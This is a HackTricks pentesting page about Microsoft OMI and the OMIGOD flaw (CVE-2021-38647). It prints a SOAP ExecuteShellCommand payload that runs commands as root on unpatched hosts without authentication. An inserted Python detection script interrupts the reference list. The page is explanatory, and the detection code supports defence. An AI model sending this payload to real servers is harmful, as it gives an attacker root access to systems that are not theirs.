# 5985,5986 - Pentesting OMI
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### **Basic Information**

**OMI** is presented as an **[open-source](https://github.com/microsoft/omi)** tool by Microsoft, designed for remote configuration management. It is especially relevant for Linux servers on Azure that use services such as:

- **Azure Automation**
- **Azure Automatic Update**
- **Azure Operations Management Suite**
- **Azure Log Analytics**
- **Azure Configuration Management**
- **Azure Diagnostics**

When these services are enabled, the `omiengine` process is started and listens on all interfaces as root.

**Default ports** used are **5985** (http) and **5986** (https).
### **[CVE-2021-38647 Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)**

As observed on 16 September, Linux servers deployed in Azure with the services mentioned above are vulnerable because of a vulnerable version of OMI. The flaw lies in how the OMI server handles messages sent to the `/wsman` endpoint: it does not require an Authorization header and, when the header is absent, incorrectly authorizes the client.

An attacker can exploit this by sending an "ExecuteShellCommand" SOAP payload without an Authorization header, which makes the server execute commands with root privileges.
```xml
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
```
For more information about this CVE **[check here](https://github.com/horizon3ai/CVE-2021-38647)**.

## References
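From a detection standpoint, the traffic described above has a clear signature: a `POST` to `/wsman` carrying an `ExecuteShellCommand_INPUT` element in the SOAP body while no `Authorization` header is present. The following is an added example (not part of the HackTricks page or the OMI project) that parses a raw HTTP request, as a proxy or packet-capture pipeline would hand it over, and flags that combination; the request bytes are constructed for the example.

```python
"""Flag unauthenticated WS-Man requests that carry an OMI ExecuteShellCommand body.
Added detection example; the sample request below is constructed, not captured."""
import xml.etree.ElementTree as ET

# Namespace of the SCX_OperatingSystem class used by the OMI shell-command method.
SCX_OS_NS = "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem"


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("utf-8", "replace").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def shell_command_in_body(body: bytes):
    """Return the requested command if the SOAP body contains
    ExecuteShellCommand_INPUT, otherwise None (non-XML bodies are ignored)."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    node = root.find(f".//{{{SCX_OS_NS}}}ExecuteShellCommand_INPUT/{{{SCX_OS_NS}}}command")
    return node.text if node is not None else None


def omigod_indicator(raw: bytes):
    """Return {'unauthenticated': bool, 'command': str} for a shell-command
    request to /wsman, or None when the request does not match the pattern."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or not path.startswith("/wsman"):
        return None
    cmd = shell_command_in_body(body)
    if cmd is None:
        return None
    return {"unauthenticated": "authorization" not in headers, "command": cmd}


# Constructed sample: the envelope from the page, sent with no Authorization header.
SAMPLE_REQUEST = (
    b"POST /wsman HTTP/1.1\r\nHost: 10.0.0.5:5985\r\n"
    b"Content-Type: application/soap+xml;charset=UTF-8\r\n\r\n"
    b'<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"><s:Body>'
    b'<p:ExecuteShellCommand_INPUT xmlns:p="' + SCX_OS_NS.encode() + b'">'
    b"<p:command>id</p:command><p:timeout>0</p:timeout>"
    b"</p:ExecuteShellCommand_INPUT></s:Body></s:Envelope>"
)
```

A request with a valid `Authorization` header still reports `unauthenticated: False`, so the same function distinguishes legitimate management traffic from the unauthenticated pattern this CVE relies on.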
* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/)
* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)